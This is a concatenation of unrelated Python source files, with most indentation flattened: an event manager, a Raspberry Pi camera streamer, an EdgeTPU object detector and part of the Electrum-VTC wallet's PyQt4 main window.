"""根据指定的分隔符进行分割"""
# 当要获取根节点时
if name == self.__rootname:
return list()
# 检查分隔符是否合法
if not splitor in name:
raise InvalidEventName("需要以 " + splitor + " 分割")
joint: list = name.split(splitor)
        # Check that the root node is valid
if joint.pop(0) != self.__rootname:
raise InvalidRootName("Event root must be " + self.__rootname)
return joint
def __listen_boardcast(self):
"""
不断地尝试从广播的事件同步队列中获取消息
并寻找, 执行对应的事件
"""
while True:
try:
eventname, args, kwargs = self.__asyncs.get()
except EOFError as _error:
break
event = self.event(eventname)
event.notify(*args, **kwargs)
def boardcast(self, eventname: str, *args, **kwargs) -> NoReturn:
"""向所有的进程广播通知触发指定的事件"""
if "manager" in modules.keys():
manager = modules.manager
manager.boardcast(eventname, *args, **kwargs)
        # Fall back to local execution if the remote manager could not be set up
else:
event = self.event(eventname)
event.notify(*args, **kwargs)
def add(self, event: Event) -> NoReturn:
"""
向事件管理器中添加事件
event: Event 类型
"""
# 分割事件名及获取根节点
current = self.__rootnode
joint = self.__split(event.name, '.')
        # Walk down the matching child nodes
for tag in joint:
try:
current = current.find(tag)
except KeyError as _error:
child = Node(tag)
current.add(child)
current = child
        # Store the event as the node's value
current.value = event
def event(self, name: str) -> Event:
"""
根据事件名查找对应的事件/事件列:
当给定的名称对应了一个事件时 - 返回该事件
当找不到对应节点时 - 报错
"""
# 分割事件名及获取根节点
joint = self.__split(name, '.')
current = self.__rootnode
        # Walk down the matching child nodes
for tag in joint:
try:
current = current.find(tag)
except KeyError as _error:
raise EventNotFound("事件 " + name + " 不存在")
# 检查并返回当前节点的事件
if not isinstance(current.value, Event):
raise EventNotFound("事件 " + name + " 不存在")
return current.value
def names(self, name: str) -> dict:
"""
返回对应路径下一级中所有的事件名称与说明:
name("leaf.plugins.access_token") ->
{
"updated": "accesstoken更新之后被调用",
"failed": "accesstoken更新失败之后调用",
"expired": "accesstoken过期之后调用",
...
}
"""
# 分割事件名获取根节点
joint = self.__split(name, '.')
current = self.__rootnode
# 迭代搜索节点
for tag in joint:
try:
current = current.find(tag)
except KeyError as _error:
raise EventNotFound("事件 " + name + " 不存在")
# 返回当前节点下所有节点的信息
result: dict = dict()
children = current.children()
for child in children:
result[child.tag] = str(child.value)
return result
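# Sketch: registering and firing an event through a Manager (reuses the
# hypothetical Event from the sketch above):
#   manager = Manager("leaf")
#   manager.add(updated)
#   manager.event("leaf.plugins.demo.updated").notify(42)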
|
camera_pi.py
|
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (320, 240)
camera.hflip = True
camera.vflip = True
# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
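# Usage sketch (hypothetical MJPEG generator, e.g. for a Flask response):
#   camera = Camera()
#   def gen():
#       while True:
#           frame = camera.get_frame()   # lazily starts the capture thread
#           yield (b'--frame\r\n'
#                  b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')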
|
edgetpu.py
|
import os
import datetime
import hashlib
import multiprocessing as mp
import numpy as np
import pyarrow.plasma as plasma
import tflite_runtime.interpreter as tflite
from tflite_runtime.interpreter import load_delegate
from frigate.util import EventsPerSecond, listen
def load_labels(path, encoding='utf-8'):
"""Loads labels from file (with or without index numbers).
Args:
path: path to label file.
encoding: label file encoding.
Returns:
Dictionary mapping indices to labels.
"""
with open(path, 'r', encoding=encoding) as f:
lines = f.readlines()
if not lines:
return {}
if lines[0].split(' ', maxsplit=1)[0].isdigit():
pairs = [line.split(' ', maxsplit=1) for line in lines]
return {int(index): label.strip() for index, label in pairs}
else:
return {index: line.strip() for index, line in enumerate(lines)}
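# Example label file contents this parser accepts (illustrative):
#   "0 person\n1 bicycle"  -> {0: 'person', 1: 'bicycle'}
#   "person\nbicycle"      -> {0: 'person', 1: 'bicycle'}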
class ObjectDetector():
def __init__(self):
edge_tpu_delegate = None
try:
edge_tpu_delegate = load_delegate('libedgetpu.so.1.0')
except ValueError:
print("No EdgeTPU detected. Falling back to CPU.")
if edge_tpu_delegate is None:
self.interpreter = tflite.Interpreter(
model_path='/cpu_model.tflite')
else:
self.interpreter = tflite.Interpreter(
model_path='/edgetpu_model.tflite',
experimental_delegates=[edge_tpu_delegate])
self.interpreter.allocate_tensors()
self.tensor_input_details = self.interpreter.get_input_details()
self.tensor_output_details = self.interpreter.get_output_details()
def detect_raw(self, tensor_input):
self.interpreter.set_tensor(self.tensor_input_details[0]['index'], tensor_input)
self.interpreter.invoke()
boxes = np.squeeze(self.interpreter.get_tensor(self.tensor_output_details[0]['index']))
label_codes = np.squeeze(self.interpreter.get_tensor(self.tensor_output_details[1]['index']))
scores = np.squeeze(self.interpreter.get_tensor(self.tensor_output_details[2]['index']))
detections = np.zeros((20,6), np.float32)
for i, score in enumerate(scores):
detections[i] = [label_codes[i], score, boxes[i][0], boxes[i][1], boxes[i][2], boxes[i][3]]
return detections
def run_detector(detection_queue, avg_speed, start):
print(f"Starting detection process: {os.getpid()}")
listen()
plasma_client = plasma.connect("/tmp/plasma")
object_detector = ObjectDetector()
while True:
object_id_str = detection_queue.get()
object_id_hash = hashlib.sha1(str.encode(object_id_str))
object_id = plasma.ObjectID(object_id_hash.digest())
object_id_out = plasma.ObjectID(hashlib.sha1(str.encode(f"out-{object_id_str}")).digest())
input_frame = plasma_client.get(object_id, timeout_ms=0)
if input_frame is plasma.ObjectNotAvailable:
continue
# detect and put the output in the plasma store
start.value = datetime.datetime.now().timestamp()
plasma_client.put(object_detector.detect_raw(input_frame), object_id_out)
duration = datetime.datetime.now().timestamp()-start.value
start.value = 0.0
avg_speed.value = (avg_speed.value*9 + duration)/10
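# The RemoteObjectDetector below and this worker rendezvous through the
# plasma store: the caller puts a frame under sha1(name) and polls
# sha1("out-" + name), which this loop fills with the raw detection array.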
class EdgeTPUProcess():
def __init__(self):
self.detection_queue = mp.SimpleQueue()
self.avg_inference_speed = mp.Value('d', 0.01)
self.detection_start = mp.Value('d', 0.0)
self.detect_process = None
self.start_or_restart()
def start_or_restart(self):
self.detection_start.value = 0.0
        if self.detect_process is not None and self.detect_process.is_alive():
self.detect_process.terminate()
print("Waiting for detection process to exit gracefully...")
self.detect_process.join(timeout=30)
if self.detect_process.exitcode is None:
print("Detection process didnt exit. Force killing...")
self.detect_process.kill()
self.detect_process.join()
self.detect_process = mp.Process(target=run_detector, args=(self.detection_queue, self.avg_inference_speed, self.detection_start))
self.detect_process.daemon = True
self.detect_process.start()
class RemoteObjectDetector():
def __init__(self, name, labels, detection_queue):
self.labels = load_labels(labels)
self.name = name
self.fps = EventsPerSecond()
self.plasma_client = plasma.connect("/tmp/plasma")
self.detection_queue = detection_queue
def detect(self, tensor_input, threshold=.4):
detections = []
now = f"{self.name}-{str(datetime.datetime.now().timestamp())}"
object_id_frame = plasma.ObjectID(hashlib.sha1(str.encode(now)).digest())
object_id_detections = plasma.ObjectID(hashlib.sha1(str.encode(f"out-{now}")).digest())
self.plasma_client.put(tensor_input, object_id_frame)
self.detection_queue.put(now)
raw_detections = self.plasma_client.get(object_id_detections, timeout_ms=10000)
if raw_detections is plasma.ObjectNotAvailable:
self.plasma_client.delete([object_id_frame])
return detections
for d in raw_detections:
if d[1] < threshold:
break
detections.append((
self.labels[int(d[0])],
float(d[1]),
(d[2], d[3], d[4], d[5])
))
self.plasma_client.delete([object_id_frame, object_id_detections])
self.fps.update()
return detections
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum_vtc import keystore
from electrum_vtc.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum_vtc.plugins import run_hook
from electrum_vtc.i18n import _
from electrum_vtc.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled)
from electrum_vtc import Transaction, mnemonic
from electrum_vtc import util, bitcoin, commands, coinchooser
from electrum_vtc import SimpleConfig, paymentrequest
from electrum_vtc.wallet import Wallet, Multisig_Wallet
try:
from electrum_vtc.plot import plot_history
except:
plot_history = None
from amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from fee_slider import FeeSlider
from electrum_vtc import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum_vtc.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-vtc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.connect(self, SIGNAL('new_fx_quotes'), self.on_fx_quotes)
self.connect(self, SIGNAL('new_fx_history'), self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.emit(SIGNAL('new_fx_history'))
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
def on_quotes(self, b):
self.emit(SIGNAL('new_fx_quotes'))
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.emit(QtCore.SIGNAL('updated'), event, *args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
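# The OpenAlias lookup is a blocking DNS query, so it runs in a daemon
# thread and signals completion via 'alias_received'; the GUI thread
# then reads self.alias_info.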
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# The 'new_transaction' callback may have fired before the GUI existed; now that it is initialized, announce anything we missed
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
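# winpos may be None (fresh wallet) or describe a screen that no longer
# exists; the assert inside the try routes both cases to the fallback
# geometry below.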
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Electrum-VTC %s - %s' % (self.wallet.electrum_version,
self.wallet.basename().decode('utf8'))
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend vertcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request vertcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
filename = filename.decode('utf8')
recent = self.config.get('recently_open', [])
try:
# sanity check: the stored value must be a sortable list; a corrupt
# config entry resets the history
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
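# 'loader' is a closure factory: it binds each menu action to its own
# 'k'. A bare lambda in this loop would late-bind 'k' and every entry
# would open the last file in the list.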
def loader(k):
return lambda: self.gui_object.new_window(k.encode('utf8'))
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(bool(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://vertcoin.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('vertcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-VTC",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Vertcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Vertcoin system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/vertcoin/electrum-vtc/issues\">https://github.com/vertcoin/electrum-vtc/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-VTC - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the notifications when three or more transactions arrived
tx_amount = len(self.tx_notifications)
if tx_amount >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
# iterate over a snapshot: removing entries from the list being
# iterated over would skip every other notification
for tx in list(self.tx_notifications):
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum-VTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mVTC'
if self.decimal_point == 8:
return 'VTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
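# 'follows' breaks signal feedback: setting the other edit's text below
# fires its textChanged handler too, and the flag makes that nested call
# return immediately instead of ping-ponging between the fields.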
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
